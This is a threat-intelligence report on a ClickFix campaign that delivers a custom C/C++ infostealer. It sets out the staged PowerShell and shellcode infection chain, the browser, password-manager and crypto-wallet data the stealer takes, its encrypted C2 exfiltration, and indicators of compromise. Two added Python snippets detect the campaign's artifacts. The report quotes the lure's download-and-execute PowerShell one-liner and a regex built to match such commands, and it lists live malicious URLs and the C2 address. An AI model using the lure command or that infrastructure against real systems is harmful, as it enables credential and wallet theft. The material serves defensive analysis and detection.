ClickFix Campaign – Russian Threat Actor Evolves to Custom InfoStealer
18 Feb, 2026
Executive Summary
This report provides an update on the ongoing ClickFix campaign that I previously partially analyzed and shared internally. At the time of the earlier investigation, the final payload was identified as Vidar Stealer. Around the same period, the team at LevelBlue published a blog highlighting a separate ClickFix domain that followed the same multi-stage infection chain and leveraged the same download endpoint, although their observed final payload was StealC. The current campaign delivers a new custom stealer, VodkaStealer.
In this current wave, the campaign demonstrates a significant evolution in both malware design and operational infrastructure:
The final payload has transitioned to a custom C/C++ stealer, hereafter referred to as VodkaStealer, replacing previous commodity malware families.
While the download URL remains consistent with prior campaigns, the C2 infrastructure has shifted geographically and technologically, now observed under a US-registered domain and IP.
Operational behaviors such as a Russian keyboard layout kill-switch, custom AES-CTR encrypted C2 communications, and fileless browser data exfiltration techniques indicate a financially motivated private actor, rather than a generic Malware-as-a-Service operation.
Additional observations suggest that the actor is Russian-speaking and operates within the CIS region, with infrastructure rotation spanning Germany, Ukraine, and the USA. The malware is specifically designed to target cryptocurrency wallets, browser credentials, and password manager data using an extensive hardcoded list of browser extensions and wallet IDs.
In summary, the campaign reflects a highly targeted, well-maintained, and evolving threat, demonstrating advanced techniques for evading detection and maintaining persistence while focusing on high-value financial data.
Key Findings
Campaign Evolution & Payload
Previous final payloads: Vidar Stealer and StealC.
Current final payload: VodkaStealer (custom native C/C++ stealer).
Download URL remains unchanged, maintaining operational continuity.
C2 infrastructure rotated from Germany → Ukraine → USA.
Infection Chain
Multi-stage execution process:
Stage 0: Compromised ClickFix domain with fake verification prompts.
Stage 1: PowerShell stager running in-memory scripts.
Stage 2: PowerShell loader performing process injection.
Stage 3: Donut shellcode loader downloading next-stage payload.
Stage 4: Final custom stealer.
Stealth techniques include hidden windows, silent error handling, and process injection.
System & Browser Targeting
Browsers: Google Chrome, Edge, Brave, Opera, Opera GX, Vivaldi, Yandex, Chromium, Firefox, Waterfox, LibreWolf, Pale Moon.
Credential theft:
Extracts stored passwords, cookies, session data.
Specifically targets password manager extensions (Bitwarden, LastPass, 1Password, KeePassXC, Dashlane, NordPass, Keeper, BrowserPass, MYKI, Splikity, CommonKey, ZohoVault).
Cryptocurrency wallets: Over 120 targeted wallet extensions including MetaMask, Phantom, Brave Wallet, Trust Wallet, Coinbase Wallet, Binance Wallet, and more.
Operational Security & Anti-Detection Features
Russian keyboard layout kill-switch avoids domestic systems.
Mutex creation prevents multiple instances.
Uses fileless techniques and in-memory execution to evade AV detection.
Incorporates a Chrome ABE bypass via an open-source post-exploitation tool (chromelevator.bin).
Process injection into svchost.exe, with self-injection as a fallback.
System Reconnaissance & Profiling
Collects detailed system information:
Windows version, installation date
CPU, GPU, RAM, screen resolution
Locale, timezone, and username
Installed software enumeration (registry-based)
Creates staging directory for collected information.
Captures screenshots for situational awareness.
Exfiltration & Communication
Establishes TCP connection to 178.16.55.40:5555.
Performs an AES-CTR encrypted channel handshake with the hardcoded key systeminfo_aes256_channel_key_2024!!.
Recursively uploads all collected files after verifying the server's acknowledgment.
Cleans up local staging files post-exfiltration.
Persistence Indicators
Creates the marker file sysinfo_user_marker to log the first execution date/time.
Prevents re-infection of the same system.
Attribution & Threat Actor Profile
Likely Russian-speaking actor within the CIS region.
Highly targeted, financially motivated, private actor.
Operational sophistication surpasses standard commodity malware campaigns.
Infection Chain
Technical Analysis
Stage 0: ClickFix Domain
During recent hunting activity focused on ClickFix infrastructure, we identified continued campaign activity with notable payload evolution.
This campaign was previously partially analyzed and findings were shared internally. In the present iteration, although the payload has changed, the download URL pattern remains consistent with previously documented infrastructure, reinforcing linkage to earlier activity.
The domain observed in this wave is: captoolsz[.]com. The domain appears to be compromised or otherwise controlled by a malicious actor and is used to present a fake verification prompt designed to socially engineer victims into executing a malicious command.

The victim is instructed to execute a command that downloads and runs a remote PowerShell script directly in memory using: powershell -c iex(irm -UseBasicParsing)
Infrastructure rotation is evident. The previously documented IP address was 91.92.240.219, while the current observed IP is 158.94.209.33. This indicates active backend management and evasive rotation practices.
Stage 1: PowerShell Stager
The initial PowerShell stager displays the message: “Wait please, don't close this window...”
The script then spawns a new hidden PowerShell process using New-Object System.Diagnostics.ProcessStartInfo. The newly created process executes additional PowerShell code that retrieves and executes further payload content directly in memory.

The window style is explicitly set to hidden in order to prevent visible artifacts. If an error occurs during execution, exceptions are silently caught and suppressed, allowing the script to terminate without alerting the user. This behavior reflects deliberate operational stealth.
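The stage-0 one-liner and the stage-1 stager share one detectable trait: a PowerShell process whose command line downloads a script and runs it in memory. The following added example (my own detection sketch, not code from the campaign or the report) classifies constructed Sysmon-style process-creation events by that pattern; the field names and sample URLs are assumptions.

```python
import re

# The report's stage-0 one-liner is "powershell -c iex(irm <url> -UseBasicParsing)":
# fetch a script over HTTP and run it in memory. The stage-1 stager repeats the
# pattern from a second PowerShell process spawned via ProcessStartInfo.
DOWNLOAD_EXEC_RE = re.compile(
    r"(iex|invoke-expression)\s*\(?\s*(irm|invoke-restmethod|iwr|invoke-webrequest)\b"
)
POWERSHELL_IMAGES = ("powershell.exe", "pwsh.exe")

def normalise(cmdline):
    """Lower-case and collapse whitespace and quoting so spacing variations still match."""
    return re.sub(r"[\s'\"`]+", " ", cmdline.lower()).strip()

def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def classify(event):
    """Return a reason if a Sysmon-ID-1-style event dict fits the chain, else None."""
    if basename(event["image"]) not in POWERSHELL_IMAGES:
        return None
    if not DOWNLOAD_EXEC_RE.search(normalise(event["command_line"])):
        return None
    if basename(event["parent_image"]) in POWERSHELL_IMAGES:
        return "stage1-style: PowerShell spawned by PowerShell, re-fetching code into memory"
    return "stage0-style: user-launched PowerShell download-and-execute one-liner"

def scan(events):
    """Return (index, reason) for every matching event, in order."""
    hits = []
    for i, event in enumerate(events):
        reason = classify(event)
        if reason:
            hits.append((i, reason))
    return hits

# Constructed sample events (not from the report); hosts are placeholders.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"image": PS, "parent_image": r"C:\Windows\explorer.exe",
     "command_line": "powershell -c iex(irm https://example.invalid/a -UseBasicParsing)"},
    {"image": PS, "parent_image": PS,
     "command_line": 'powershell -NoProfile -c "IEX (IRM https://example.invalid/b)"'},
    {"image": PS, "parent_image": r"C:\Windows\explorer.exe",
     "command_line": "powershell -c Get-Process"},
]

if __name__ == "__main__":
    for idx, why in scan(SAMPLE_EVENTS):
        print(idx, why)
```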
Stage 2: PowerShell Loader
The PowerShell loader retrieves a binary payload from the previously observed endpoint. Rather than executing the file in a conventional manner, the loader performs process injection, enabling the payload to execute in memory without standard disk-based execution artifacts. This stage marks the transition from script-based execution to native code execution, increasing complexity and reducing detection opportunities.


Stage 3: VodkaStealer Loader
The downloaded binary is identified as Donut-generated shellcode, consistent with earlier ClickFix campaign behavior. After decryption with a Donut decryptor, analysis shows that the payload immediately hides its execution window.

The malware calls AdjustTokenPrivileges with SeDebugPrivilege enabled, granting debug privileges required for advanced process injection techniques.

Two primary functions are executed at this stage. The first function downloads the next-stage payload, and the second function locates svchost.exe and performs process injection into it.

The endpoint used to download the next stage is http[:]//94.157.35.115/user_profiles_photo/cptchbuild.bin, which matches previously documented infrastructure.

Stage 4: VodkaStealer
The final payload is again delivered as Donut shellcode. After decryption, the previously observed Vidar Stealer is found to have been replaced by VodkaStealer, a custom native C/C++ stealer.

The stealer begins by hiding its execution window.

It checks the current keyboard layout and terminates execution if the layout is Russian. This behavior suggests either Russian-speaking threat actors or intentional avoidance of infecting Russian systems.

A mutex named sysinfo_single_instance is created to prevent multiple instances of VodkaStealer from running on the same system.

The VodkaStealer iterates through eight Chromium-based browsers: Google Chrome, Microsoft Edge, Brave, Opera, Opera GX, Vivaldi, Yandex, and Chromium. It checks whether these browsers are installed and then searches for specific hardcoded extension IDs within each browser profile. If matching extensions are found, the browser index is stored for further processing.

VodkaStealer enumerates running processes, identifies active browser processes, and terminates them to unlock browser database files before extracting stored credentials and wallet data.

The stealer queries ip-api.com/json to retrieve the victim’s public IP address and country code.

It generates a victim identifier using the MachineGuid value and retrieves the current UserName.


System reconnaissance includes collecting the Windows product name, installation date, CPU name, CPU core count, GPU information, RAM size, screen resolution, locale information, and time zone using registry queries and Windows APIs.


A working directory is created in the Temp folder for staging collected information. It is named using the format sysinfo_countrycode_ipaddr_DayMonthYearHourMinute, for example sysinfo_IN_8.8.8.8_18020261010.

VodkaStealer creates InstalledSoftware.txt and enumerates installed applications by querying the registry paths SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall and SOFTWARE\WOW6432Node\Windows\CurrentVersion\Uninstall, writing the results to that file.


VodkaStealer then proceeds to collect data from Chromium-based browsers, focusing on cryptocurrency wallet extensions and password managers.

A screenshot of the victim machine is captured and saved in the staging directory.
The malware then downloads chromelevator.bin from http[:]//94.157.35.115/user_profiles_photo/chromelevator.bin.

It attempts to locate svchost.exe and inject the payload using process injection. If injection into svchost.exe fails, it performs self-injection.
The chromelevator.bin component is an open-source post-exploitation tool designed to bypass Chromium’s App-Bound Encryption (ABE). It uses direct syscalls and reflective process hollowing to launch a legitimate browser process in a suspended state and inject a payload to hijack its security context. This fileless technique enables decryption and exfiltration of sensitive Chromium data, including cookies, saved passwords, and payment information.
The tool is open source and available at https://github.com/xaitax/Chrome-App-Bound-Encryption-Decryption.


VodkaStealer also checks for the presence of Firefox-based browsers, including Firefox, Waterfox, LibreWolf, and Pale Moon. It attempts to harvest credentials and cookies by extracting logins.json, key4.db, cookies.sqlite, and related certificate databases from their profile directories.

In addition to standard browser credential theft, the malware specifically targets Chromium-based password manager extensions. It searches for hardcoded extension IDs associated with password managers including Bitwarden, RoboForm, LastPass, 1Password, KeePassXC, Dashlane, NordPass, Keeper, BrowserPass, MYKI, Splikity, CommonKey, and ZohoVault. If these extensions are installed, the malware attempts to extract stored vault data and associated extension storage files.
VodkaStealer separately targets cryptocurrency wallet browser extensions. It contains an extensive hardcoded list of more than 120 wallet extension IDs. Targeted wallets include MetaMask (multiple IDs), Phantom, Brave Wallet, Trust Wallet, Coinbase Wallet, Binance Wallet, Ronin, Keplr, Rabby, Exodus, Zerion, SafePal, Rainbow, Tonkeeper, Uniswap, XDEFI, Crypto.com, Hashpack, Gero, MathWallet, TrezorPassword, TronLink, TokenPocket, BybitWallet, BackpackWallet, MagicEdenWallet, Temple, PetraAptos, MartianAptos, and PontemAptos.
The malware also collects FileZilla credentials, Telegram Desktop session data, and OpenVPN Connect profiles. All collected data is staged within the central working directory.

It creates a file called systeminfo.txt and writes the collected system information into it.

For exfiltration, the malware validates the target directory and establishes a TCP socket connection to 178.16.55.40 on port 5555. It performs a custom AES-based handshake and establishes two AES-CTR encrypted communication channels. The hardcoded encryption key used is “systeminfo_aes256_channel_key_2024!!”. The resulting staging directory structure is shown below:

The victim identifier is transmitted to the C2 server, and the malware recursively uploads the staged directory contents. It waits for an “OK” confirmation from the server before cleaning up and deleting all staged files.

Finally, the malware creates a marker file in the Temp directory named sysinfo_user_marker. The file records the first execution time in the format “First run: DD/MM/YYYY HH:MM:SS”. This marker is used to indicate that the system has already been infected and processed.
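The staging directory name, the files written into it, and the sysinfo_user_marker file are durable host artifacts a responder can look for in Temp. The following added triage helper is my own example, not code from the report; it builds a constructed sample Temp tree, so the paths and contents are assumptions, and the timestamp regex is deliberately tolerant because the report's sample name shows 11 digits where DayMonthYearHourMinute would give 12.

```python
import os
import re
import tempfile
from datetime import datetime

# Staging directory format from the report: sysinfo_<countrycode>_<ipaddr>_<DayMonthYearHourMinute>
# (example in the report: sysinfo_IN_8.8.8.8_18020261010); digit width kept tolerant.
STAGING_DIR_RE = re.compile(r"^sysinfo_[A-Z]{2}_\d{1,3}(?:\.\d{1,3}){3}_\d{10,12}$")
MARKER_NAME = "sysinfo_user_marker"
MARKER_RE = re.compile(r"^First run: (\d{2}/\d{2}/\d{4} \d{2}:\d{2}:\d{2})\s*$")
# Files the stealer writes into the staging directory before exfiltration
STAGED_FILES = {"systeminfo.txt", "InstalledSoftware.txt"}

def parse_marker(text):
    """Return the first-run timestamp recorded in sysinfo_user_marker, or None if malformed."""
    m = MARKER_RE.match(text)
    if not m:
        return None
    return datetime.strptime(m.group(1), "%d/%m/%Y %H:%M:%S")

def scan_temp(temp_dir):
    """Report the marker timestamp and any staging directories (with staged files still present)."""
    findings = {"first_run": None, "staging_dirs": []}
    marker = os.path.join(temp_dir, MARKER_NAME)
    if os.path.isfile(marker):
        with open(marker, encoding="utf-8", errors="replace") as fh:
            findings["first_run"] = parse_marker(fh.read())
    for name in sorted(os.listdir(temp_dir)):
        full = os.path.join(temp_dir, name)
        if os.path.isdir(full) and STAGING_DIR_RE.match(name):
            present = sorted(STAGED_FILES & set(os.listdir(full)))
            findings["staging_dirs"].append({"name": name, "staged_files": present})
    return findings

def build_sample_temp():
    """Constructed sample Temp tree mimicking the artifacts; not real victim data."""
    root = tempfile.mkdtemp(prefix="vodka_demo_")
    staging = os.path.join(root, "sysinfo_IN_8.8.8.8_18020261010")
    os.mkdir(staging)
    for fname in ("systeminfo.txt", "InstalledSoftware.txt"):
        with open(os.path.join(staging, fname), "w") as fh:
            fh.write("constructed sample\n")
    with open(os.path.join(root, MARKER_NAME), "w") as fh:
        fh.write("First run: 18/02/2026 10:10:00\n")
    os.mkdir(os.path.join(root, "sysinfo_unrelated"))  # should not match
    return root

if __name__ == "__main__":
    print(scan_temp(build_sample_temp()))
```

Because the stealer deletes the staged files only after the C2 answers "OK", a staging directory that still contains systeminfo.txt or InstalledSoftware.txt suggests exfiltration did not complete.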

IOC
ClickFix Domain
captoolsz[.]com
Stealer Download URL
http[:]//94.157.35.115/user_profiles_photo/cptchbuild.bin
Chromium ABE bypass component
http[:]//94.157.35.115/user_profiles_photo/chromelevator.bin
Current ClickFix C2 / staging IP
158.94.209.33
Previous infrastructure IP
91.92.240.219
Current TCP socket C2 server for exfiltration
178.16.55.40:5555
Mutex
sysinfo_single_instance
Stealer Loader Download URL
http[:]//94.157.35.115/user_profiles_photo/cptch.bin
cptchbuild.bin
4f6afc69c3151bbc71f86417dbf8cca0eed89b47c66d3e0d8712bfd4eba87a00
cptch.bin
f9eb41e9989ac7ce9c1ece15a7e7c4a0adef1434444598f28c6ba5d20daf1352
chromelevator.bin
c8dbd5335dc0828556e6abc2a804121bf65240719a8a3388a5af6b65065a2d5b
decrypted_cptch.bin
6437db6158ee8fa2d316ba3625ca8df6afdb9304bb3c1e6ee4fb0bcdabb7f212
decrypted_cptchbuild.bin
8720d5388e561835e5496498f61de3132e6e63f2d47964ace897ecb528e2fec3